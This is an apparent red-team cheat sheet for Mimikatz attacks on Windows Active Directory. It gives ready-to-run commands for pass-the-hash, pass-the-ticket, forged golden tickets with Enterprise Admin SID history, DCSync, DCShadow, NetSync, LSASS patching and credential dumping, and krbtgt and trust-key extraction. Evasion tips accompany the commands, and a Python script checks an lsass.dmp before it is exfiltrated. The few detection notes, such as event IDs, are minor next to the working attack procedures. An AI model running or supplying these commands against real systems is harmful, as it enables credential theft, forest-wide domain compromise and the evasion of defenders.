Using Mimikatz
OverPass-the-Hash
Mimikatz can perform the well-known operation “OverPass-The-Hash” to run a process under the security context of another account’s credentials.
This is extremely powerful and should not be underestimated. Behind the scenes, sekurlsa::pth starts the target process in a new logon session (logon type 9, NewCredentials) and writes the supplied NTLM hash (and AES keys, if given with /aes128 or /aes256) into that session's credential material in LSASS, which is why it needs privilege::debug and local administrator rights. Windows then uses that key to request a Kerberos TGT from the domain controller the first time the process contacts a Kerberos service, so from the spawned PowerShell you can perform lateral movement with PsExec, WMI, WinRM, etc. without ever knowing the plaintext password. Note that whoami in the new process still shows the original user: the injected credentials are only used for network authentication. Supplying only the NTLM hash forces an RC4 (etype 0x17) TGT request, which stands out on a domain where AES is the norm; pass the AES key as well where you have it.
OverPass-the-Hash can be used to impersonate a machine account which has interesting use case scenarios (see https://blog.secarma.co.uk/labs/using-machine-account-passwords-during-an-engagement). The blog talks about a scenario where they compromised a machine and had captured the machine account NTLM hash. The machine was later taken offline but found to be the only path to Domain Admin. The solution was to use sekurlsa::pth to impersonate the machine account and perform the required operations.
sekurlsa::pth /user:manager /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell
sekurlsa::pth /user:WIN2008R2$ /domain:chaos.local /ntlm:FFB91205A3D288362D86C529728B9DC0 /run:powershell
Pass-The-Ticket
Once a Kerberos ticket has been obtained (exported from your own session with kerberos::list /export, from any session with sekurlsa::tickets /export, or forged), the .kirbi file can be copied to another system and injected into the current logon session. The injection itself involves no communication with the Domain Controller and needs no special privileges, because a user may always add tickets to their own logon session. An injected TGT is then used to request service tickets from the DC as normal, while an injected service ticket (TGS) is presented directly to the service.
/filename – the ticket's filename (can be specified multiple times)
/directory – a directory path; all .kirbi files inside it will be injected
kerberos::ptt /filename:"theTicket.kirbi"
kerberos::ptt /directory:"C:"
Kerberos Golden SID-Hopping Ticket
Once the krbtgt account of any single domain in a forest is compromised (typically by dumping its hash from a Domain Controller), the entire forest is compromised. Mimikatz can forge a golden ticket for that domain whose PAC carries extra SIDs in its SID history (the /sids parameter). Trusts within a forest do not apply SID filtering, so adding the forest root's Enterprise Admins SID (RID 519) to a ticket forged with a child domain's krbtgt hash grants Enterprise Admin rights in every domain of the forest.
/user: any user name in the child domain (it need not exist, though a real one draws less attention)
/domain: child domain FQDN
/sid: SID of the child domain (S-1-5-21-..., without a trailing RID)
/krbtgt: NTLM hash of the child domain's krbtgt account
/sids: SID of the forest root domain's Enterprise Admins group (the root domain SID with RID 519 appended), placed in the ticket's SID history
/ptt: optional, inject the ticket into the current session instead of writing a .kirbi file
kerberos::golden /user:manager /domain:fortress.citadel.local /sid:S-1-5-21-3702248245-3669926273-3383077842 /krbtgt:FFB91205A3D288362D86C529728B9DC0 /sids:S-1-5-21-2244208837-681476370-1982983775-519 /ptt
ChangeNTLM (Updating Passwords)
There are rare scenarios where you know a user's NTLM hash and need the plaintext password but are unable to crack the hash. You can change the user's password to a value you control, do what you need, and then change it back with Mimikatz. This also works for an account whose password has expired, since a password change is still permitted for expired accounts. No elevated privileges are needed: lsadump::changentlm uses the SAMR password-change call that any user may invoke for their own account, and it accepts the current NTLM hash in place of the current password. Before relying on it, run net user $username /domain to confirm the account may change its password (almost always true), that it is not locked out, and that the password has not changed since the hash was captured (compare "Password last set"). Changing it back may be refused by the domain's minimum password age or password history policy, so check those with net accounts /domain first. Keep the window short: while the password is changed, the user's existing sessions keep working but any new logon with the old password fails, and each change is recorded on the DC as event 4723.
lsadump::changentlm /server:dc.lab.local /user:sample [/oldntlm OR /oldpassword] [/newntlm OR /newpassword]
lsadump::changentlm /server:dc.lab.local /user:sample /oldntlm:FFB91205A3D288362D86C529728B9DC0 /newpassword:kiwi
lsadump::changentlm /server:dc.lab.local /user:sample /oldpassword:kiwi /newntlm:FFB91205A3D288362D86C529728B9DC0
DCSync
Use replication privileges to have a domain controller return any account's credential material (NTLM hash, Kerberos keys and password history) over the directory replication service (DRSUAPI), exactly as it would for another DC. The required rights on the domain object are the extended rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All (plus DS-Replication-Get-Changes-In-Filtered-Set for attributes in the filtered set); Domain Admins, Enterprise Admins and the domain controller accounts have them by default, but audit the domain ACL for anyone else who does. On the DC the request is logged as event 4662 with those rights' GUIDs in the Properties field, which is the standard DCSync detection.
lsadump::dcsync /domain:chaos.local /user:CHAOS\Administrator
lsadump::dcsync /domain:chaos.local /all /csv
Download an object using its GUID
DCSync can also target an object by GUID rather than by name, which is how the trust keys are dumped: list the trustedDomain objects with PowerShell, then pass the GUID of the trust to lsadump::dcsync.
Get-ADObject -LDAPFilter '(objectClass=trustedDomain)' | Select name,objectguid
lsadump::dcsync /guid:{aaa17f7f-715d-4e99-b613-1d9ae7ffee0f}
DCShadow
DCShadow registers the attacker's host as a rogue domain controller (a temporary nTDSDSA server object plus the matching SPNs on a computer account) and pushes object, attribute and schema changes to the legitimate DCs through replication. Because the changes arrive as replicated data rather than as LDAP writes, they do not produce the usual directory service change events on the receiving DCs; the rogue DC registration itself is still observable (SPN changes on the computer account in 4742, creation and deletion of the nTDSDSA object in 5137/5141). It requires Domain Admin or equivalent rights and two Mimikatz instances on the same host: one running as SYSTEM that holds the object/attribute/value and answers as the fake DC, and one running as the privileged domain user that issues /push. See: https://www.dcshadow.com/
lsadump::dcshadow /object:"whatever" /attribute:"" /value:""
lsadump::dcshadow /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local /attribute:description /value:"DCShadow was here!"
lsadump::dcshadow /push
http://www.labofapenetrationtester.com/2018/04/dcshadow.html
SIDHistory
Very useful, and also covered in the DCShadow presentation: set the SIDHistory attribute of an account you control to the SID of a high-privilege group such as Domain Admins (RID 512) or Enterprise Admins (RID 519) and that account holds the highest privileges without any change to group membership or ACLs. SIDHistory is normally writable only through the DsAddSidHistory API; because the DCShadow write arrives via replication, that restriction does not apply.
lsadump::dcshadow /object:helpdeskuser /attribute:SIDHistory /value:S-1-5-21-3270384115-3177237293-604223748-519
NetSync
NetSync uses the Netlogon secure channel (MS-NRPC) rather than the directory replication service, so it is worth considering when you expect DCSync (DRSUAPI) to be detected: it does not produce the 4662 replication-rights access that DCSync does. It is more limited in that it can only retrieve the secrets of machine accounts, and it must itself authenticate with a machine account the DC accepts for this call, in practice a domain controller's account (dc$ in the example below).
lsadump::netsync /dc:chaos.local /user:dc$ /ntlm:FFB91205A3D288362D86C529728B9DC0 /account:DESKTOP-WARDOG$
Log Credentials to File (Bypassing Credential Guard)
privilege::debug
misc::memssp
memssp patches LSASS in memory so that plaintext credentials are written to C:\Windows\System32\mimilsa.log each time someone authenticates on the host (logon, unlock, runas). It captures them at authentication time rather than reading cached secrets back from memory, which is why it still yields plaintext where Credential Guard prevents sekurlsa::logonpasswords from doing so. The patch does not survive a reboot, and where LSA Protection (RunAsPPL) is enabled privilege::debug is not enough to touch LSASS: Mimikatz's driver (!+ followed by !processprotect /process:lsass.exe /remove) is needed first.
Dump Passwords (Memory and Registry)
The sekurlsa::logonpasswords module lists all available credential material held by the standard Windows authentication packages and security support providers: msv (NTLM hashes), wdigest (plaintext, but only on old systems or where the UseLogonCredential registry value has been set), kerberos (plaintext and encryption keys, also via ekeys), tspkg, ssp, credman, etc. Mimikatz cannot dump credential material held by third-party SSPs, since the memory structures and offsets for those are not known to it.
sekurlsa::logonpasswords
sekurlsa::ekeys
lsadump::sam
lsadump::cache
lsadump::secrets
ts::logonpasswords
ts::mstsc
vault::list
vault::cred
dpapi::wifi
dpapi::wwan
NTLM hashes can be used for pass-the-hash against services that accept NTLM authentication and, via OverPass-the-Hash, to obtain Kerberos tickets for Kerberos-only services. The most common targets are PsExec, WMI and WinRM.
From a memory dump (e.g. an lsass.dmp produced with Task Manager, procdump or the comsvcs.dll MiniDump export, then parsed offline so that Mimikatz never runs on the target):
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
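Before carrying an lsass.dmp off a host it is worth confirming that it is a usable minidump, since a dump written with the wrong options or cut short by an interrupted transfer silently yields nothing in sekurlsa. The following Python is an added example, not from the original page or from Mimikatz: it parses the MINIDUMP header and stream directory, checks for the streams sekurlsa::minidump relies on (SystemInfo for OS version and architecture, ModuleList to locate lsasrv.dll, Memory64List for the memory contents), and reports how much memory the dump actually carries. The sample dump is constructed in code with an abbreviated SystemInfo stream, and module entries are read only for their names.

```python
import struct
from typing import Dict, List, Tuple

MDMP_SIGNATURE = 0x504D444D  # "MDMP"
MINIDUMP_VERSION = 0xA793
STREAM_NAMES = {3: "ThreadList", 4: "ModuleList", 5: "MemoryList", 6: "Exception",
                7: "SystemInfo", 9: "Memory64List", 16: "MemoryInfoList"}
REQUIRED_STREAMS = {4, 7, 9}  # what sekurlsa::minidump needs to find lsasrv and read memory
ARCH = {0: "x86", 9: "amd64", 12: "arm64"}
MODULE_SIZE = 108  # sizeof(MINIDUMP_MODULE)


def parse_streams(buf: bytes) -> Dict[int, Tuple[int, int]]:
    """Map stream type -> (rva, size) from the MINIDUMP_HEADER and MINIDUMP_DIRECTORY."""
    if len(buf) < 32:
        raise ValueError("too short for a minidump header")
    sig, _ver, nstreams, dir_rva, _cksum, _ts, _flags = struct.unpack_from("<IIIIIIQ", buf, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("not a minidump (bad signature)")
    if dir_rva + 12 * nstreams > len(buf):
        raise ValueError("stream directory runs past end of file")
    streams = {}
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from("<III", buf, dir_rva + 12 * i)
        streams[stype] = (rva, size)
    return streams


def module_names(buf: bytes, streams: Dict[int, Tuple[int, int]]) -> List[str]:
    """Loaded module paths from the ModuleList stream (MINIDUMP_STRING is length-prefixed UTF-16LE)."""
    rva, _ = streams[4]
    (count,) = struct.unpack_from("<I", buf, rva)
    names = []
    for i in range(count):
        (name_rva,) = struct.unpack_from("<I", buf, rva + 4 + MODULE_SIZE * i + 20)  # .ModuleNameRva
        (nbytes,) = struct.unpack_from("<I", buf, name_rva)
        names.append(buf[name_rva + 4:name_rva + 4 + nbytes].decode("utf-16-le"))
    return names


def memory64_extent(buf: bytes, streams: Dict[int, Tuple[int, int]]) -> Tuple[int, int]:
    """(total captured bytes, file offset where the memory data starts) from Memory64List."""
    rva, _ = streams[9]
    count, base_rva = struct.unpack_from("<QQ", buf, rva)
    total = sum(struct.unpack_from("<QQ", buf, rva + 16 + 16 * i)[1] for i in range(count))
    return total, base_rva


def check_dump(buf: bytes) -> Dict:
    streams = parse_streams(buf)
    report = {"streams": sorted(STREAM_NAMES.get(s, f"type{s}") for s in streams),
              "missing": sorted(STREAM_NAMES[s] for s in REQUIRED_STREAMS - set(streams))}
    if not report["missing"]:
        arch, _, _, _, _, major, minor, build, _ = struct.unpack_from("<HHHBBIIII", buf, streams[7][0])
        report["os"] = f"{major}.{minor}.{build}"
        report["arch"] = ARCH.get(arch, f"unknown({arch})")
        report["has_lsasrv"] = any(n.lower().endswith("\\lsasrv.dll") for n in module_names(buf, streams))
        total, base = memory64_extent(buf, streams)
        report["memory_bytes"] = total
        report["truncated"] = base + total > len(buf)  # descriptors promise more data than the file holds
    report["usable"] = (not report["missing"] and report.get("has_lsasrv", False)
                        and not report.get("truncated", True))
    return report


def is_minidump(buf: bytes) -> bool:
    try:
        parse_streams(buf)
        return True
    except ValueError:
        return False


def build_sample_minidump() -> bytes:
    """Constructed minimal dump: header, 3 directory entries, abbreviated streams, 4 KiB of memory."""
    buf = bytearray(32 + 3 * 12)

    def append(data: bytes) -> int:
        rva = len(buf)
        buf.extend(data)
        return rva

    sysinfo_rva = append(struct.pack("<HHHBBIIII", 9, 0, 0, 4, 1, 10, 0, 19041, 2))  # amd64, 10.0.19041
    name = "C:\\Windows\\System32\\lsasrv.dll".encode("utf-16-le")
    name_rva = append(struct.pack("<I", len(name)) + name + b"\0\0")
    module = struct.pack("<QIIII", 0x7FF800000000, 0x200000, 0, 0, name_rva) + bytes(MODULE_SIZE - 24)
    modlist_rva = append(struct.pack("<I", 1) + module)
    mem_rva = len(buf)
    base_rva = mem_rva + 16 + 16  # data follows the 1-entry descriptor table
    append(struct.pack("<QQ", 1, base_rva) + struct.pack("<QQ", 0x7FF800000000, 0x1000))
    append(bytes(0x1000))
    struct.pack_into("<IIIIIIQ", buf, 0, MDMP_SIGNATURE, MINIDUMP_VERSION, 3, 32, 0, 0, 0)
    for i, entry in enumerate([(7, 24, sysinfo_rva), (4, 4 + MODULE_SIZE, modlist_rva), (9, 32, mem_rva)]):
        struct.pack_into("<III", buf, 32 + 12 * i, *entry)
    return bytes(buf)


if __name__ == "__main__":
    print(check_dump(build_sample_minidump()))
```

A "usable" result only means the container is intact and complete; whether sekurlsa can parse the LSASS structures inside still depends on the Windows build and on which Mimikatz version you run against it.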
Dump Domain Controller Credentials
Asks the LSA server to retrieve SAM/AD credential material (Mimikatz's own wording: "normal, patch on the fly or inject"). /patch returns the LM/NTLM hashes; /inject returns everything, including supplemental credentials such as Kerberos AES keys and WDigest hashes, by injecting into LSASS. Requires SYSTEM or debug rights on a Domain Controller. Both modes modify the running LSASS process; /patch is generally considered the more OPSEC-safe of the two. For a deep dive on what each does to LSASS, see:
https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html
Don’t specify a name to dump all hashes
lsadump::lsa /inject /name:krbtgt
lsadump::lsa /patch /name:krbtgt
sekurlsa::krbtgt
Dump Domain Controller Trust Keys
Extracts the domain's trust relationships from Active Directory, including the inter-realm trust keys (the trust accounts' NTLM and AES keys). With a trust key you can forge inter-realm TGTs for the trusting domain, which makes these as sensitive as krbtgt.
lsadump::trust /patch